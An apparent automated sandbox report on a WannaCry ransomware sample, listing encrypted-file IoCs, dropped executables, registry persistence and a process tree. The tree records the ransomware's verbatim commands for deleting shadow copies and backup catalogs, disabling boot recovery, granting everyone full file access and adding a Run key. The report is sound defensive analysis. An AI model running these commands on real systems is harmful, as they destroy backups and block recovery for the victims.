ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\StopPop.xltm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Downloads\TraceWatch.xlsb 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Music\RestartPublish.docm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
description ioc pid Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" 4152 svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" 4152 svchost.exe -
Adds Run entry to start application 2 TTPs 1 IoCs
description ioc pid Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nmsqcsinudawe237 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" 3780 reg.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4956 icacls.exe -
Executes dropped EXE 14 IoCs
pid Process 4328 taskdl.exe 3032 taskdl.exe 4188 @[email protected] 4064 @[email protected] 3364 taskhsvc.exe 2968 taskse.exe 4236 @[email protected] 4600 taskdl.exe 4896 taskdl.exe 4240 taskse.exe 5092 @[email protected] 1704 taskse.exe 4012 @[email protected] 4844 taskdl.exe -
Wannacry file encrypt 64 IoCs
description ioc pid Process File renamed C:\Users\Admin\Desktop\WaitRevoke.txt.WNCRYT => C:\Users\Admin\Desktop\WaitRevoke.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\WaitRevoke.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\WritePop.pptx.WNCRYT => C:\Users\Admin\Desktop\WritePop.pptx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\WritePop.pptx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\CloseAdd.3gp.WNCRYT => C:\Users\Admin\Desktop\CloseAdd.3gp.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\CloseAdd.3gp.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\DismountHide.php.WNCRYT => C:\Users\Admin\Desktop\DismountHide.php.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\DismountHide.php.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\JoinPush.wmv.WNCRYT => C:\Users\Admin\Desktop\JoinPush.wmv.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\JoinPush.wmv.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\OpenSplit.xltx.WNCRYT => C:\Users\Admin\Desktop\OpenSplit.xltx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\OpenSplit.xltx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\SkipUnlock.xltx.WNCRYT => C:\Users\Admin\Desktop\SkipUnlock.xltx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\SkipUnlock.xltx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\StartLock.zip.WNCRYT => C:\Users\Admin\Desktop\StartLock.zip.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\StartLock.zip.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\StopBlock.bat.WNCRYT => C:\Users\Admin\Desktop\StopBlock.bat.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\StopBlock.bat.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Desktop\SuspendAssert.xlsm.WNCRYT => C:\Users\Admin\Desktop\SuspendAssert.xlsm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\SuspendAssert.xlsm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\Are.docx.WNCRYT => C:\Users\Admin\Documents\Are.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Are.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\Files.docx.WNCRYT => C:\Users\Admin\Documents\Files.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Files.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\MergeStep.vsdx.WNCRYT => C:\Users\Admin\Documents\MergeStep.vsdx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\MergeStep.vsdx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\Opened.docx.WNCRYT => C:\Users\Admin\Documents\Opened.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Opened.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\OptimizeGroup.txt.WNCRYT => C:\Users\Admin\Documents\OptimizeGroup.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\OptimizeGroup.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\Recently.docx.WNCRYT => C:\Users\Admin\Documents\Recently.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Recently.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\SubmitDebug.ppt.WNCRYT => C:\Users\Admin\Documents\SubmitDebug.ppt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\SubmitDebug.ppt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\These.docx.WNCRYT => C:\Users\Admin\Documents\These.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\These.docx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\UnblockExport.csv.WNCRYT => C:\Users\Admin\Documents\UnblockExport.csv.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\UnblockExport.csv.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\WriteDismount.xlsx.WNCRYT => C:\Users\Admin\Documents\WriteDismount.xlsx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\WriteDismount.xlsx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\AddDismount.pptm.WNCRYT => C:\Users\Admin\Documents\AddDismount.pptm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\AddDismount.pptm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\ApproveMeasure.docm.WNCRYT => C:\Users\Admin\Documents\ApproveMeasure.docm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\ApproveMeasure.docm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\CloseLock.potx.WNCRYT => C:\Users\Admin\Documents\CloseLock.potx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\CloseLock.potx.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\DisconnectCompare.xltm.WNCRYT => C:\Users\Admin\Documents\DisconnectCompare.xltm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\DisconnectCompare.xltm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\DismountUse.odp.WNCRYT => C:\Users\Admin\Documents\DismountUse.odp.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\DismountUse.odp.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\NewUnprotect.xltm.WNCRYT => C:\Users\Admin\Documents\NewUnprotect.xltm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\NewUnprotect.xltm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\OutConvert.docm.WNCRYT => C:\Users\Admin\Documents\OutConvert.docm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\OutConvert.docm.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\ReceiveEnable.pot.WNCRYT => C:\Users\Admin\Documents\ReceiveEnable.pot.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\ReceiveEnable.pot.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\Documents\UnregisterRead.ods.WNCRYT => C:\Users\Admin\Documents\UnregisterRead.ods.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\UnregisterRead.ods.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT => C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fd336ea-c68e-47df-b2bf-24527681fe24}\0.0.filtertrie.intermediate.txt.WNCRYT => C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fd336ea-c68e-47df-b2bf-24527681fe24}\0.0.filtertrie.intermediate.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fd336ea-c68e-47df-b2bf-24527681fe24}\0.0.filtertrie.intermediate.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File renamed C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4c7824f5-2f93-430b-a953-417ce8bc1d70}\0.0.filtertrie.intermediate.txt.WNCRYT => C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4c7824f5-2f93-430b-a953-417ce8bc1d70}\0.0.filtertrie.intermediate.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4c7824f5-2f93-430b-a953-417ce8bc1d70}\0.0.filtertrie.intermediate.txt.WNCRY 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4188 @[email protected] 4064 @[email protected] 4236 @[email protected] 5092 @[email protected] 4012 @[email protected] -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3364 taskhsvc.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3780 reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
- Drops Office document
- Wannacry file encrypt
PID:4884
-
C:\Windows\SysWOW64\attrib.exeattrib +h .1⤵
- Views/modifies file attributes
PID:4928
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q1⤵
- Modifies file permissions
PID:4956
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe1⤵
- Executes dropped EXE
PID:4328
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3011572374379.bat1⤵
- Suspicious use of WriteProcessMemory
PID:2952
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs1⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe1⤵
- Executes dropped EXE
PID:3032
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4188
-
C:\Windows\SysWOW64\cmd.exePID:4116
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4064
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe1⤵
- Loads dropped DLL
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3364
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4804
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]1⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:2968
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]1⤵
- Sets desktop wallpaper using registry
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4236
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f1⤵
- Suspicious use of WriteProcessMemory
PID:4352
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "nmsqcsinudawe237" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f1⤵
- Adds Run entry to start application
- Modifies registry key
PID:3780
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe1⤵
- Executes dropped EXE
PID:4600
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet1⤵
- Suspicious use of WriteProcessMemory
PID:844
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet1⤵
- Uses Volume Shadow Copy Service COM API
- Deletes shadow copies
PID:716
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Uses Volume Shadow Copy Service COM API
PID:1104
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete1⤵
- Suspicious use of AdjustPrivilegeToken
- Deletes shadow copies
PID:1572
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in system dir
PID:2076
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:3760
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵
- Checks system information in the registry (likely anti-VM)
PID:3920
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵
- Windows security modification
PID:4152
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe1⤵
- Executes dropped EXE
PID:4896
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]1⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:4240
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:5092
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]1⤵
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:1704
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:4012
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe1⤵
- Executes dropped EXE
PID:4844
Network
MITRE ATT&CK Enterprise v15
MITRE ATT&CK Additional techniques
- T1107
- T1089
- T1060
- T1158